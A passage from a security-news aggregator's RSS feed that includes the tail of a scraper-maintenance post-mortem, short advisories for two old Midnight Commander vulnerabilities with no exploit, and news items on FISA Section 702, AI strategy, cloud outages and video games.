extraction logic to rendered content</li></ul><p>The commit:</p><pre>feat: migrate to headless browser for JS rendering</pre><p>This was not a patch. It was an architectural change.</p><h3>Weeks 5–6: The Death-by-a-Thousand-Cuts Phase</h3><p>After the major breakages were addressed, the scraper did not become stable. It became fragile in smaller, more exhausting ways.</p><p>At that point, the issues were less dramatic but more persistent:</p><ul><li>selectors drifting slightly</li><li>sessions expiring unexpectedly</li><li>proxy IPs getting flagged despite rotation</li><li>header inconsistencies triggering blocks</li><li>login instability across runs</li><li>intermittent extraction failures that were hard to reproduce</li></ul><p>None of these problems looked catastrophic on their own. Together, they created a system that demanded constant attention.</p><p>Over the next two weeks, I spent another <strong>18 hours</strong> on recurring maintenance:</p><ul><li><strong>6 hours</strong> on repeated selector and parser adjustments</li><li><strong>4 hours</strong> on session expiry and login instability</li><li><strong>5 hours</strong> on flagged proxies and request-shape tuning</li><li><strong>3 hours</strong> on debugging inconsistent extraction output</li></ul><p>At this stage, adding new features was no longer the hard part. Keeping the scraper alive was.</p><p>That is where many scraping projects become a poor engineering tradeoff. They do not fail all at once. They slowly consume more time than they justify.</p><h3>What Broke, in Total</h3><p>By the end of the six-week maintenance period, the 48 hours broke down like this:</p><figure><img alt="amazon scraper common failure categories table" src="https://cdn-images-1.medium.com/max/1024/1*odSt4nBsdILnHicb8Gjv9Q.png"><figcaption>image created with openAI</figcaption></figure><p>That was double the original build time.</p><h3>What Actually Breaks in a Production Scraper</h3><p>Looking back, the failures fell into a few predictable categories.</p><h3>1. DOM and layout churn</h3><p>Front-end changes do not need to be dramatic to break a scraper. A renamed class, a removed attribute, or a slightly different nesting structure can be enough to make extraction silently fail.</p><p>This is one of the most common breakages because extraction logic is usually tightly coupled to assumptions about page structure.</p><h3>2. Rate-limit changes</h3><p>The safe request envelope is often narrower than it seems during development.</p><p>A scraper may work for a few hundred requests in testing, then degrade quickly once request volume, concurrency, or timing patterns become more predictable. Once you start hitting thresholds, response quality drops fast.</p><h3>3. Session and authentication instability</h3><p>Authenticated scraping is rarely set-and-forget.</p><p>Cookies expire, session state degrades, login flows change, and retries can trigger secondary issues if they are too aggressive. Once authentication becomes unreliable, the rest of the pipeline becomes unreliable with it.</p><h3>4. IP reputation and proxy decay</h3><p>Not all IPs are equal.</p><p>Some fail immediately. Others work for a while and then degrade. Even with rotation, low-quality IPs or heavily reused ranges tend to become liabilities over time. Good extraction logic cannot compensate for bad network reputation.</p><h3>5. Browser and behavioral detection</h3><p>A scraper may send correct requests and still look automated.</p><p>Timing patterns, navigation sequences, header order, TLS characteristics, and rendering behavior all contribute to whether traffic looks like a real user or a scripted system. Once browser automation enters the stack, this gets even harder to manage.</p><h3>6. JavaScript rendering requirements</h3><p>More websites are shipping less meaningful HTML in the initial response and relying on client-side rendering to assemble page content. That means an HTTP-based scraper can fail even when access is technically possible.</p><p>Once JavaScript execution becomes necessary, the scope of the project changes.</p><h3>The Main Lesson: Working Scraper Code Is Not Production Infrastructure</h3><p>A scraper can work reliably in a test window and still be nowhere near production-ready.</p><p>That is because “working” in development usually means:</p><ul><li>low request volume</li><li>a short time horizon</li><li>one known session flow</li><li>one current DOM snapshot</li><li>no sustained anti-bot pressure</li><li>limited operational variability</li></ul><p>Production changes the problem. Now the scraper has to stay correct over time, under changing conditions, while continuing to deliver reliable data. That is not just parsing. That is infrastructure.</p><p>In this case, the numbers were simple:</p><ul><li><strong>Initial build:</strong> 24 hours</li><li><strong>Maintenance over the next 6 weeks:</strong> 48 hours</li></ul><p>Using a rough engineering cost of <strong>$100/hour</strong>, that comes out to:</p><ul><li><strong>Build cost:</strong> $2,400</li><li><strong>Maintenance cost:</strong> $4,800</li></ul><p>And even that understates the <a href="https://medium.com/python-in-plain-english/guide-cutting-web-scraping-and-proxy-costs-in-2025-3fa3fc4c6855">true cost</a>, because it does not capture interruption, context switching, roadmap delays, or the drag of reactive engineering work.</p><h3>The Hidden Cost Was Focus</h3><p>The biggest cost was not difficulty. It was attention.</p><p>Every maintenance cycle pulled time away from actual product work. Instead of improving features, strengthening downstream systems, or shipping new capabilities, I was debugging selectors, sessions, retries, proxies, and rendering issues.</p><p>That is the part teams often underestimate. Scraping infrastructure does not just consume engineering hours. It competes directly with the roadmap.</p><p>If scraping is your core product, that may be a justified investment.</p><p>If it is a supporting capability, the economics look very different.</p><h3>DIY Scraper vs. Managed Scraping API</h3><p>After this project, I think the decision is less about ideology and more about focus.</p><p>A DIY scraper gives you full control, but it also makes you responsible for everything:</p><ul><li>extraction logic</li><li>session stability</li><li>retries and pacing</li><li>proxy strategy</li><li>browser execution</li><li>anti-bot mitigation</li><li>recurring break/fix maintenance</li></ul><p>An Instagram <a href="https://get.brightdata.com/tuoo4r?utm_source=inplainenglish&amp;utm_medium=article&amp;utm_campaign=scraperapi&amp;utm_content=Instagram-Scraper-Broke-12-Times-in-6-Weeks"><strong>managed scraping API</strong></a> moves much of that operational burden to a provider whose job is to maintain the collection layer.</p><p>Here is the practical comparison:</p><figure><img alt="DIY scraper vs managed scraping API for amazon" src="https://cdn-images-1.medium.com/max/1024/1*VnMkwrMob4slFxCOZh_2zQ.png"><figcaption>Image created with openAI</figcaption></figure><p>For teams that need the data but do not want to become specialists in adversarial browser automation, that tradeoff becomes rational very quickly.</p><h3>When Building Your Own Scraper Still Makes Sense</h3><p>There are still valid reasons to build in-house:</p><ul><li>the target site is simple</li><li>your extraction requirements are unusually specific</li><li>scraping is central to your product or IP</li><li>you want full control over the collection layer</li><li>the goal is learning, research, or experimentation</li></ul><p>If the system is strategic and you have the engineering capacity to maintain it properly, building it yourself can make sense.</p><p>But if the target is a large, fast-changing, heavily protected platform, the long-term maintenance profile deserves at least as much attention as the initial build.</p><h3>Closing Thought</h3><p>The first version of my Instagram scraper worked.</p><p>That turned out to be the least important fact about it.</p><p>What mattered was how quickly it started failing under real conditions, and how much engineering time it took to restore reliability every time it broke.</p><p>That is the distinction I would emphasize to anyone evaluating a scraping project:</p><p><strong>A scraper that works in development is a parser.<br>A scraper that works in production is infrastructure.</strong></p><p>And infrastructure is where the real cost begins.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=aad38b68f238" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/instagram-scraper-broke-12-times-in-6-weeks-a-maintenance-postmortem-aad38b68f238">Instagram Scraper Broke 12 Times in 6 Weeks: A Maintenance Postmortem</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-1999-1337 | Midnight Commander up to 4.5.10.22 FTP Client cleartext storage (XFDB-9873 / OSVDB-5921)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in Midnight Commander up to 4.5.10.22. Affected by this issue is some unknown functionality of the component FTP Client. Executing a manipulation can lead to cleartext storage of sensitive information.

This vulnerability is tracked as CVE-199...]]></description>
<link>https://tsecurity.de/de/3445684/sicherheitsluecken/cve-1999-1337-midnight-commander-up-to-451022-ftp-client-cleartext-storage-xfdb-9873-osvdb-5921/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3445684/sicherheitsluecken/cve-1999-1337-midnight-commander-up-to-451022-ftp-client-cleartext-storage-xfdb-9873-osvdb-5921/</guid>
<pubDate>Sun, 19 Apr 2026 10:07:36 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/midnight_commander">Midnight Commander up to 4.5.10.22</a>. Affected by this issue is some unknown functionality of the component <em>FTP Client</em>. Executing a manipulation can lead to cleartext storage of sensitive information.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-1999-1337">CVE-1999-1337</a>. The attack is restricted to local execution. No exploit exists.

It is advised to implement further authentication.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-1999-0480 | Midnight Commander 4.x symlink]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in Midnight Commander 4.x. Affected by this issue is some unknown functionality. This manipulation causes symlink following.

This vulnerability is tracked as CVE-1999-0480. The attack is restricted to local execution. No exploit exists.

I...]]></description>
<link>https://tsecurity.de/de/3445167/sicherheitsluecken/cve-1999-0480-midnight-commander-4x-symlink/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3445167/sicherheitsluecken/cve-1999-0480-midnight-commander-4x-symlink/</guid>
<pubDate>Sun, 19 Apr 2026 01:07:31 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/midnight_commander">Midnight Commander 4.x</a>. Affected by this issue is some unknown functionality. This manipulation causes symlink following.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-1999-0480">CVE-1999-0480</a>. The attack is restricted to local execution. No exploit exists.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[US Congress Fails to Pass Long-Term FISA Extension, Authorizes It Through April 30]]></title>
<description><![CDATA[Yesterday the U.S. Congress approved "a short-term extension" of a FISA law that allows wiretaps without a warrant for surveilling foreign targets, reports CNN — but only until April 30. Republican congressional leaders had sought an 18-month extension, but "failed to secure" the votes after "cla...]]></description>
<link>https://tsecurity.de/de/3444954/it-security-nachrichten/us-congress-fails-to-pass-long-term-fisa-extension-authorizes-it-through-april-30/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3444954/it-security-nachrichten/us-congress-fails-to-pass-long-term-fisa-extension-authorizes-it-through-april-30/</guid>
<pubDate>Sat, 18 Apr 2026 21:51:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Yesterday the U.S. Congress approved "a short-term extension" of a FISA law that allows wiretaps without a warrant for surveilling foreign targets, reports CNN — but only until April 30. Republican congressional leaders had sought an 18-month extension, but "failed to secure" the votes after "clamoring from some of their members for reforms to protect Americans' privacy."

The warrantless surveillance law, known as Section 702 of the Foreign Intelligence Surveillance Act, was set to expire on Monday night. Members are hoping the additional time will allow them to come to agreement without ending authorization for the intelligence gathering program, which permits US officials to monitor phone calls and text messages from foreign targets... There was an hour of suspense in the Senate Friday morning when it appeared possible that Democratic Sen. Ron Wyden, a longtime critic of FISA 702, might block the House-passed extension. But ultimately, he said his House colleagues had assured him "this short-term extension makes reform more likely, and expiration makes reform less likely," and so he chose not to object.... 

House Republican leaders believed Thursday night they had struck a deal with conservative holdouts who harbor deep and longstanding concerns that a key piece of the law infringes on Americans' privacy rights. But in a pair of after-midnight votes, more than a dozen rank-and-file Republicans rejected the long-term reauthorization plan on the floor, which was the result of days of tense negotiations among leadership, lawmakers and the White House. 

The law allows authorized US officials to gather phone calls and text messages of foreign targets, but they can also incidentally collect the data of Americans in the process. Senior national security officials have for years said the law is critical for thwarting terror attacks, stemming the flow of fentanyl into the US and stopping ransomware attacks on critical infrastructure. Civil liberties groups on the left and the right, meanwhile, argue the surveillance authority risks infringing on Americans' privacy.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=US+Congress+Fails+to+Pass+Long-Term+FISA+Extension%2C+Authorizes+It+Through+April+30%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F04%2F18%2F1834202%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F04%2F18%2F1834202%2Fus-congress-fails-to-pass-long-term-fisa-extension-authorizes-it-through-april-30%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/04/18/1834202/us-congress-fails-to-pass-long-term-fisa-extension-authorizes-it-through-april-30?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[“A surprise BAFTA result lands” as South of Midnight outperforms expectations and a new winner takes the spotlight]]></title>
<description><![CDATA[South of Midnight wins the BAFTA for New Intellectual Property, beating titles like Split Fiction and ARC Raiders, marking Xbox’s only award at this year’s ceremony.]]></description>
<link>https://tsecurity.de/de/3444523/windows-tipps/a-surprise-bafta-result-lands-as-south-of-midnight-outperforms-expectations-and-a-new-winner-takes-the-spotlight/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3444523/windows-tipps/a-surprise-bafta-result-lands-as-south-of-midnight-outperforms-expectations-and-a-new-winner-takes-the-spotlight/</guid>
<pubDate>Sat, 18 Apr 2026 15:54:06 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[South of Midnight wins the BAFTA for New Intellectual Property, beating titles like Split Fiction and ARC Raiders, marking Xbox’s only award at this year’s ceremony.]]></content:encoded>
</item>
<item>
<title><![CDATA[Republican Mutiny Sinks Trump’s Push to Extend Warrantless Surveillance]]></title>
<description><![CDATA[A post-midnight revolt in the House sank the White House’s efforts to extend Section 702—a spy program the FBI has used to look into members of Congress, protesters, and political donors. This article has been indexed from Security Latest Read…
Read more →
The post Republican Mutiny Sinks Trump’s...]]></description>
<link>https://tsecurity.de/de/3442363/it-security-nachrichten/republican-mutiny-sinks-trumps-push-to-extend-warrantless-surveillance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3442363/it-security-nachrichten/republican-mutiny-sinks-trumps-push-to-extend-warrantless-surveillance/</guid>
<pubDate>Fri, 17 Apr 2026 16:35:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A post-midnight revolt in the House sank the White House’s efforts to extend Section 702—a spy program the FBI has used to look into members of Congress, protesters, and political donors. This article has been indexed from Security Latest Read…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/republican-mutiny-sinks-trumps-push-to-extend-warrantless-surveillance/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/republican-mutiny-sinks-trumps-push-to-extend-warrantless-surveillance/">Republican Mutiny Sinks Trump’s Push to Extend Warrantless Surveillance</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Republican Mutiny Sinks Trump's Push to Extend Warrantless Surveillance]]></title>
<description><![CDATA[A post-midnight revolt in the House sank the White House's efforts to extend Section 702—a spy program the FBI has used to look into members of Congress, protesters, and political donors.]]></description>
<link>https://tsecurity.de/de/3442327/it-nachrichten/republican-mutiny-sinks-trumps-push-to-extend-warrantless-surveillance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3442327/it-nachrichten/republican-mutiny-sinks-trumps-push-to-extend-warrantless-surveillance/</guid>
<pubDate>Fri, 17 Apr 2026 16:17:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A post-midnight revolt in the House sank the White House's efforts to extend Section 702—a spy program the FBI has used to look into members of Congress, protesters, and political donors.]]></content:encoded>
</item>
<item>
<title><![CDATA[Early Edition: April 17, 2026]]></title>
<description><![CDATA[Signup to receive the Early Edition in your inbox here. A curated weekday guide to major news and developments over the last 24 hours. Here’s today’s news: IRAN WAR – LEBANON  On Thursday, President Donald Trump announced a 10-day ceasefire between Israel and Lebanon. It went into effect at midni...]]></description>
<link>https://tsecurity.de/de/3441910/it-security-nachrichten/early-edition-april-17-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3441910/it-security-nachrichten/early-edition-april-17-2026/</guid>
<pubDate>Fri, 17 Apr 2026 14:17:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Signup to receive the Early Edition in your inbox here. A curated weekday guide to major news and developments over the last 24 hours. Here’s today’s news: IRAN WAR – LEBANON  On Thursday, President Donald Trump announced a 10-day ceasefire between Israel and Lebanon. It went into effect at midnight in Lebanon and prompted thousands of […]</p>
<p>The post <a href="https://www.justsecurity.org/136594/early-edition-april-16-2026-2/">Early Edition: April 17, 2026</a> appeared first on <a href="https://www.justsecurity.org/">Just Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI, market whiplash and the case for a force multiplier]]></title>
<description><![CDATA[In early February 2026, markets delivered a powerful reminder of how sensitive industries have become to new developments in artificial intelligence. Software stocks slid after investors reacted to new AI capabilities, and days later, insurance intermediary stocks dropped sharply following news t...]]></description>
<link>https://tsecurity.de/de/3441875/it-nachrichten/ai-market-whiplash-and-the-case-for-a-force-multiplier/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3441875/it-nachrichten/ai-market-whiplash-and-the-case-for-a-force-multiplier/</guid>
<pubDate>Fri, 17 Apr 2026 14:08:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In early February 2026, markets delivered a powerful reminder of how sensitive industries have become to new developments in artificial intelligence. <a href="https://www.reuters.com/business/us-software-stocks-stabilize-after-bruising-selloff-ai-disruption-fears-2026-02-05/?" rel="nofollow">Software stocks slid</a> after investors reacted to new AI capabilities, and days later, insurance intermediary stocks dropped sharply following news that OpenAI approved a self-service insurance broker application. In less than a week, the software and insurance sectors saw <a href="https://www.investing.com/news/stock-market-news/insurance-broker-stocks-tumble-as-openai-approves-first-ai-insurance-app-4494866?" rel="nofollow">material valuation swings tied to AI sentiment</a> rather than proven outcomes.</p>



<p>These moves aren’t isolated either. Headlines about generative AI tools targeting legal research and workflow automation have also coincided with investor doubt across parts of financial services and knowledge fields. The market reaction was severe and swift — a clear signal that AI can reshape perceptions of value and risk.</p>



<h2 class="wp-block-heading">Defining AI for your business and your workforce</h2>



<p>Strategic AI integration starts with definition. AI today is powerful at pattern recognition, prediction and automation of structured tasks. But it does not think, reason or exercise professional judgment in the human sense. It simulates responses based on training data and statistical relationships, and it can be wrong or “hallucinate” plausible but incorrect results, a risk well documented in research on generative models.</p>



<p>This has real implications in regulated fields such as law, insurance and health care. Only licensed professionals can provide legal or medical advice. AI can augment those professionals — speeding up research or analysis — but it cannot assume responsibility, hold a license or stand in court. The liability and ethical stakes are high.</p>



<p>Instead of viewing AI as a replacement for expertise, CIOs should position it as a force multiplier. AI:</p>



<ul class="wp-block-list">
<li>Accelerates research</li>



<li>Surfaces patterns in data faster than traditional tools</li>



<li>Supports decision workflows</li>
</ul>



<p>But it should not replace professional judgment where outcomes matter. Organizations that treat AI as a co-pilot, not a substitute, protect both quality and trust within their organizations and externally with their customers, vendors and partners.</p>



<h2 class="wp-block-heading">Building a deliberate AI strategy</h2>



<p>To navigate AI disruption effectively, businesses need a clear, offensive strategy that aligns technology with core value propositions. Here are five key priorities:</p>



<h3 class="wp-block-heading">1. Define AI in business terms</h3>



<p>Too often, organizations adopt tools without understanding how they advance organizational strategic objectives. AI is a set of capabilities, not a one-size-fits-all solution. Clarify which problems AI will solve, which outcomes you seek and which risks you must mitigate with its use and alongside its use.</p>



<h3 class="wp-block-heading">2. Reinforce your value proposition</h3>



<p>When markets assume an entire industry might be “done” because of AI headlines, it’s usually because the industry’s value has not been sufficiently articulated. Complex commercial insurance advice, nuanced legal counsel and consultative enterprise relationships cannot be fully commoditized. Leaders must articulate and defend these differentiators to both internal and external audiences.</p>



<h3 class="wp-block-heading">3. Invest in talent, not just tools</h3>



<p>AI’s value is directly tied to the humans who deploy it. Firms must maintain a pipeline of entry-level and mid-career talent who understand both domain context and AI literacy so that future entry-level organizational work is not dependent exclusively on AI. This dual fluency is what separates AI-enabled advantage from tool-driven mediocrity.</p>



<h3 class="wp-block-heading">4. Communicate team value and vision</h3>



<p>Headlines drive fear. Clear, consistent messaging about how AI enhances, not replaces, human expertise strengthens morale and aligns teams with strategic direction.</p>



<h3 class="wp-block-heading">5. Shift from defensive to offensive</h3>



<p>Defensive strategies focus on risk avoidance; offensive strategies focus on growth. Leaders must identify where AI can unlock new service models, improve customer experience, streamline operations and create new revenue streams. Redesigning workflows around AI requires intent, not reaction.</p>



<h2 class="wp-block-heading">The real impact on work</h2>



<p>The debate about AI’s impact on jobs often overlooks a more practical reality: AI is more likely to reshape work than eliminate entire professions and industries.</p>



<p>Workforce projections consistently show that automation will affect significant portions of routine and structured work, but there is no broad consensus that employment will disappear wholesale. Many estimates suggest that AI will both displace and create roles, leading to workforce evolution rather than collapse.</p>



<p>In fact, AI’s measurable productivity and employment effects across industries have yet to emerge. A survey of roughly 6,000 executives across the U.S. and Europe found that nearly <a href="https://www.techradar.com/pro/is-ai-at-work-actually-helping-major-survey-claims-many-firms-see-no-obvious-benefit-despite-billions-in-investment?" rel="nofollow">nine in 10 firms</a> report no significant productivity gains from AI over the past three years, despite broad adoption of the technology. Similarly, most respondents reported minimal impacts on employment to date, underscoring that early AI usage has been more experimental than transformative.</p>



<p>McKinsey’s most recent global survey supports this mixed picture: Around <a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai?" rel="nofollow">88% of organizations</a> say they use AI in at least one business function, but only a minority have scaled AI programs across the enterprise or seen material enterprise-wide financial impact.</p>



<p>Talent constraints are slowing AI progress. Industry surveys consistently show that organizations struggle to find professionals with the technical and governance expertise needed to scale AI beyond pilot programs. That imbalance has implications beyond staffing numbers. It affects how all organizations grow, innovate and compete.</p>



<p>The more useful question for CIOs is not how many jobs AI will remove, but how work will be redesigned. AI is not a one-time disruption; it is an ongoing shift in how technology integrates with business strategy. Markets will react to headlines, sentiment will fluctuate and new capabilities will spark fresh waves of optimism and anxiety. Over time, however, AI will simply become part of the enterprise operating environment.</p>



<p>Organizations that navigate this well will not treat AI as either a threat or a cure-all. They will define how it fits their model, invest in talent alongside tools and strengthen the human expertise that sets them apart.</p>



<p>The real question is not whether disruption will continue, because it will. Instead, ask yourself how deliberately you choose to deploy AI when it is in your control.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[When cloud giants neglect resilience]]></title>
<description><![CDATA[In a recent article chronicling the history of Microsoft Azure and its intensifying woes, we see a narrative that has been building throughout the industry for years. As cloud computing evolved from a buzzword to the backbone of digital infrastructure, major providers like Microsoft, Amazon, and ...]]></description>
<link>https://tsecurity.de/de/3441426/ai-nachrichten/when-cloud-giants-neglect-resilience/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3441426/ai-nachrichten/when-cloud-giants-neglect-resilience/</guid>
<pubDate>Fri, 17 Apr 2026 11:33:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In a recent article chronicling the <a href="https://www.theregister.com/2026/04/04/azure_talent_exodus/">history of Microsoft Azure and its intensifying woes</a>, we see a narrative that has been building throughout the industry for years. As cloud computing evolved from a buzzword to the backbone of digital infrastructure, major providers like Microsoft, Amazon, and Google have had to make compromises. Their promises of near-perfect uptime shifted from an expectation to “good enough,” influenced by economic pressures that have seen the cloud giants prioritize cost cuts and staff reductions over previously non-negotiable service reliability.</p>



<p>Frankly, many who follow the cloud space closely, including myself, have been warning about this situation for some time. Cloud outages are no longer rare, freak events. They are ingrained in the model as accepted collateral for the rapid growth and relentless cost-cutting that define this era of cloud computing. The story of Azure, as discussed in the referenced Register piece, is simply the latest and most prominent example of a much larger, industrywide trend.</p>



<p>This is not to say that cloud computing is inherently unstable or that its advantages—agility, scalability, rapid deployment—are a mirage. Enterprises aren’t abandoning the cloud. Far from it. Adoption continues at pace, even as these high-profile outages occur. The question is not whether the cloud is worth it, but rather, how much unreliability is acceptable for all that innovation and efficiency?</p>



<h2 class="wp-block-heading">The price of cost optimization</h2>



<p>If you trace the decisions of major public cloud players, a clear theme emerges. Competitive pressure from rivals translates to constant cost control, rushing services to market, shaving operational budgets, automating wherever possible, and reducing (or outright eliminating) teams of deeply experienced engineering talent who once ensured continuity and institutional knowledge. The comments from a former Azure engineer clearly illustrate how an exodus of talent, paired with an almost single-minded focus on AI and automation, is having downstream effects on the platform’s stability and support.</p>



<p>The irony is sharp: As cloud providers trumpet their AI prowess and machine-driven automation, the human expertise that built and reliably ran these platforms is no longer considered mission-critical. Automation isn’t a cure-all; companies still need experienced architects and operators who understand system limits, manage dependencies, handle failures, and respond deftly to unpredictable failures. Recent major outages reflect the slow but sure loss of that critically embedded human knowledge. Meanwhile, engineering decisions are increasingly made by those tasked with juggling ever-larger portfolios, new feature launches, and cost-reduction mandates, rather than contributing a methodical focus on resilience and craftsmanship.</p>



<p>Azure faces growing pains at scale, with tens of thousands of AI-generated lines of code created, tested, and deployed daily—sometimes by other AI agents —creating a self-reinforcing cycle of complexity and opacity. The resulting “compute crunch” puts even more strain on infrastructure, which, despite its sophistication, now handles heavier loads with fewer people providing oversight.</p>



<h2 class="wp-block-heading">Outages aren’t driving users away</h2>



<p>A natural question emerges: With reliability clearly taking a back seat, why aren’t enterprises reconsidering cloud altogether? I’ve argued for years that the game has changed. The benefits of cloud centralization, automation, and connectivity have become so fundamental to operations that the industry has quietly recalibrated its tolerance for outages. Public cloud is so deeply embedded into the business and digital operations that stepping back would mean undoing years, and often decades, of progress.</p>



<p>Headline-grabbing outages are dramatic but usually survivable. <a href="https://www.networkworld.com/article/967679/what-is-disaster-recovery-how-to-ensure-business-continuity.html">Disaster recovery</a> plans, multi-region deployments, and architectural workarounds are now essentials for all major cloud-based companies. Building with failure in mind is a standard cost, not an avoidable exception. For most CIOs, the persistent risk of downtime is a manageable variable, balanced against the unmatchable benefits of cloud agility and in-house scale.</p>



<p>Providers know this well, and their actions reflect it. Outages may sting a bit in the press, but the real-world consequences have yet to outweigh the benefits to companies that push further into the cloud. As such, the providers’ logic is simple: As long as customers accept outages, however grudgingly, there’s little incentive to switch to costlier, less scalable systems.</p>



<h2 class="wp-block-heading">How enterprises can adapt</h2>



<p>With outages now the price of admission, enterprises should recognize that neither staff cuts nor the blind pursuit of automation will stop anytime soon. Cloud providers may promise improvements, but their incentives will remain focused on cost control over reliability. Organizations must adapt to this new normal, but they can still make choices that reduce their risk.</p>



<p>First, enterprises should prioritize fault-resistant cloud architecture. Adopting <a href="https://www.infoworld.com/article/3584433/are-you-ready-for-multicloud-a-checklist.html">multicloud</a> and <a href="https://www.networkworld.com/article/964498/what-is-hybrid-cloud-computing.html">hybrid cloud</a> strategies, while complex, reduces the technical risk associated with reliance on a single provider.</p>



<p>Second, it’s crucial to invest in in-house expertise that understands both the workloads and the nuances of cloud service behavior. While the providers may treat their operations talent as expendable, nothing will replace the value of an enterprise’s in-house team to independently monitor, test, and prepare for the unexpected.</p>



<p>Finally, enterprises must enforce strict vendor management. This means holding providers accountable for promised service-level agreements, monitoring transparency in communication and incident reporting, and leveraging contracted services to their fullest extent, especially as the cloud market matures and customer influence grows.</p>



<p>The era of the infallible cloud is over. As public cloud providers pursue operational efficiency and AI dominance, resilience has taken a hit, and both providers and users must adapt. The challenge for today’s enterprises is to strategically mitigate the most likely consequences before the next outage strikes.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[A first look at Metro 2039 shows how its Ukrainian developer turned the darkness up to 11]]></title>
<description><![CDATA[If the real world isn’t grim enough for you, Ukranian developer 4A Games has your back: Metro 2039 has been announced and is scheduled to arrive this winter. And based on the developer’s first look at the title, Metro 2039 looks to be an even darker affair than previous titles in the series. A ta...]]></description>
<link>https://tsecurity.de/de/3439739/it-nachrichten/a-first-look-at-metro-2039-shows-how-its-ukrainian-developer-turned-the-darkness-up-to-11/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3439739/it-nachrichten/a-first-look-at-metro-2039-shows-how-its-ukrainian-developer-turned-the-darkness-up-to-11/</guid>
<pubDate>Thu, 16 Apr 2026 19:32:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If the real world isn’t grim enough for you, Ukranian developer 4A Games has your back: <em>Metro 2039</em> has been announced and is scheduled to arrive this winter. And based on the developer’s first look at the title, <em>Metro 2039</em> looks to be an even darker affair than previous titles in the series. A tall order, but the real-world turmoil that has enveloped 4A Games since Russia’s invasion of Ukraine sounds like it has turned into a painful inspiration for the developer.</p><p>The lengthy cinematic reveal, which also contains a brief bit of gameplay at the end, doesn’t give much of the story away. But it does serve to place you right in the ruined, terrifying world of the Metro series. <em>Metro 2039</em> arrives about 25 years after a nuclear apocalypse wiped out most life on the planet. The series focuses on survivors who live in Moscow’s ruined metro system. 4A says that this time out, the different underground factions have been united by a group known as “the Novoreich,” complete with a new ruler, the Spartan known as Hunter.</p><p>Despite Hunter promising “salvation and a new life” for the survivors left on the surface, things aren’t exactly rosy underground. As you might expect, this supposedly “united” society is still a complete disaster, with propaganda, authoritarian rule and violence the 